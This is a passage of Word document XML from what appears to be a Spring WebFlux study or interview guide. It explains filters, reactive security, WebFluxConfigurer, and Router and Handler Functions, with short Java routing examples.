        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring WebFlux are similar to Spring MVC filters but are designed for reactive streams. They allow you to perform operations like logging, security, or modifying the request and response in a non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450000BA"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Filters implement the WebFilter interface and can be applied globally or specifically to individual routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28C28D" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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10. Reactive Security (Spring Security for WebFlux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC730A"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Spring Security for WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides security support for reactive applications. It works in a non-blocking, asynchronous manner to support reactive authentication and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02961BFB"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It includes support for OAuth2, JWT, and session-based authentication, adapted for reactive streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC1B63" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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11. WebFlux Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72738F70"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WebFluxConfigurer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface allows developers to configure Spring WebFlux. You can customize the default behavior of WebFlux through this interface, such as configuring interceptors, custom exception handlers, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652B0CD"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For example, you can implement the addCorsMappings method to configure Cross-Origin Resource Sharing (CORS) mappings for your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D557EB7" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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66513CA">
          <v:rect id="_x0000_i2280" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB0EF2" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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Summary of Key Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA912EF"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DispatcherHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Main entry point for routing HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60483D6E"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HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maps requests to appropriate handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69804C"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HandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Invokes the handler (controller).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406BCD8F"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Reactive HTTP Handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Handles the request and returns </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9BAA6"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Mono and Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Core reactive types for asynchronous handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3A21A9"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Non-blocking HTTP client for calling external services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132A2272"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Router Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A functional approach for defining routes and handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527835EC"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WebExceptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handles exceptions in a non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B975A6"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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows non-blocking operations such as logging, security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3561F"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Reactive Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Non-blocking security for reactive apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B9D8F"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WebFluxConfigurer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configures WebFlux's default behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C883691" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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EB50DB7">
          <v:rect id="_x0000_i2281" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A21451" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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Spring WebFlux provides a reactive approach to building web applications, making it suitable for high-performance, highly scalable, and event-driven systems. These core components help developers create applications that can handle concurrent requests efficiently, without blocking or waiting for each request to complete, thus ensuring better resource utilization and responsiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD3A6A"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B57FC7B">
          <v:rect id="_x0000_i2282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B6AAC2" w14:textId="320A8F5A"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496" w:name="_Toc196307976"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe the roles of Router Functions and Handler Functions in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p w14:paraId="2E03C3D5" w14:textId="11CB1CCB" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Router Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handler Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide an alternative to the traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotation-based controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> style, allowing developers to define routing and handling of HTTP requests in a more functional, declarative manner. These components play a key role in the routing mechanism in WebFlux applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C98EB" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07"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1. Router Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040367B6"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Router Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are responsible for defining the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>routes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the application. These routes map incoming HTTP requests (based on the URL and HTTP method) to specific </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handler functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE59A8"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RouterFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a functional interface (RouterFunction&lt;ServerResponse&gt;) that takes an HTTP request and returns a ServerResponse. It is used to define which handler function should be invoked for a particular route.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B23FC5"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Router Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically used to set up the routing logic in a more functional, less declarative manner than using @RequestMapping or other annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19455C2F"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Router functions are typically configured in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configuration class</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can be composed together for more complex routing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE34F8"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1172C2EC"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC8D61"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public class RouterConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8C48A" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7358B72C"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D781968"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public RouterFunction&lt;ServerResponse&gt; route(HandlerFunction handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73737F86"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return RouterFunctions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F0223B"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route(RequestPredicates.GET("/hello"), handler::handleHello)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075DF04D"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andRoute(RequestPredicates.GET("/goodbye"), handler::handleGoodbye);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D87CA9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41332C32"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63335AF8"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4435D002"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The RouterFunctions.route() method defines a route for GET /hello, which will be handled by handler::handleHello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79B67D"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The RequestPredicates.GET("/goodbye") defines another route for GET /goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5ACA7A" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07"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2. Handler Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451687D5"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Handler Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are responsible for handling the HTTP requests routed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Router Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface that contains a single method, ServerResponse handle(ServerRequest request), which is invoked to process the incoming request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65C43C"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Handler functions are used to implement the business logic or processing logic for the incoming HTTP requests. They return a ServerResponse, which represents the HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725DAB5"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be thought of as an alternative to a controller method in Spring MVC but in a functional style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42443256"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4BEC40"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B33960"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public class MyHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD07D2" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B11C526"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public Mono&lt;ServerResponse&gt; handleHello(ServerRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C5360B"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return ServerResponse.ok().bodyValue("Hello, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB72BEB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CD42D" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A049B4A"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public Mono&lt;ServerResponse&gt; handleGoodbye(ServerRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC630AA"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return ServerResponse.ok().bodyValue("Goodbye, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0745A7E1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1646061B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17650976"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A28AA91"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The handleHello method processes a request and responds with a Hello, World! message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25244715"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Similarly, handleGoodbye responds with Goodbye, World!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7B243" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07"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How Router Functions and Handler Functions Work Together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370EB90A"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Router Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handler Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically used together to provide a complete routing and handling mechanism in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD827C"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
